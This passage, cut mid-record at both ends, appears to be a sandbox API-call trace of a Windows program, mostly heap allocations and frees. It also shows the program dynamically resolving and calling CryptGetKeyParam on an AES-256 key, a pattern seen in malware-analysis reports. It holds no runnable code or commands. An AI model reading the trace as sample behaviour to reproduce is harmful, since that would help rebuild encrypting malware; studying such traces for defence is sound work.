Flags=0x0, Size=0x20) returned 0x43cfae0 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.775] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0118.775] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0118.776] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0118.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0118.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0118.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0118.776] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0118.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.777] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0118.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.777] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.777] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.778] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0118.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0118.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0118.778] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0118.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0118.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0118.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0118.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0118.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0118.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.782] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0118.782] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2910, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2910*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0118.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: 